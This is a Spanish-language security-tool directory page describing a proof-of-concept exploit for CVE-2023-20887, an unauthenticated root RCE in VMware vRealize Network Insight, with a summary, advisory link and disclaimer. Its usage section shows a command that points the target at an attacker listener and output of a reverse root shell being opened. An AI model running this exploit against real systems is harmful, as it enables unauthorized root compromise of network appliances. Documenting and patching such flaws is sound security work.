Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight RCE preautenticado (CVE-2023-20887) | Kitploit
Herramientas/GitHubGitHub/sinsinology/cve-2023-20887
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubsinsinology/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight RCE preautenticado (CVE-2023-20887)

Ver Repositorio
229411hace 3 añosRevisado por Kitploit
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-20887

POC para CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) RCE no autenticado

Análisis Técnico

Se puede encontrar un análisis de causa raíz de la vulnerabilidad en mi blog: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

poc

Resumen

VMWare Aria Operations for Networks (vRealize Network Insight) es vulnerable a inyección de comandos cuando acepta entradas del usuario a través de la interfaz RPC de Apache Thrift. Esta vulnerabilidad permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema operativo subyacente como el usuario root. La interfaz RPC está protegida por un proxy inverso que puede ser omitido. VMware ha evaluado la gravedad de este problema en el rango de gravedad Crítico con una puntuación base máxima de CVSSv3 de 9.8. un actor malicioso puede obtener ejecución remota de código en el contexto de 'root' en el dispositivo. Las versiones de VMWare 6.x son vulnerables.

Uso

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones del Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Síguenos en Twitter para las últimas investigaciones de seguridad:

  • SinSinology
  • SummoningTeam

Descargo de responsabilidad

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables por el mal uso del software. Úselo de manera responsable.

Descargar herramienta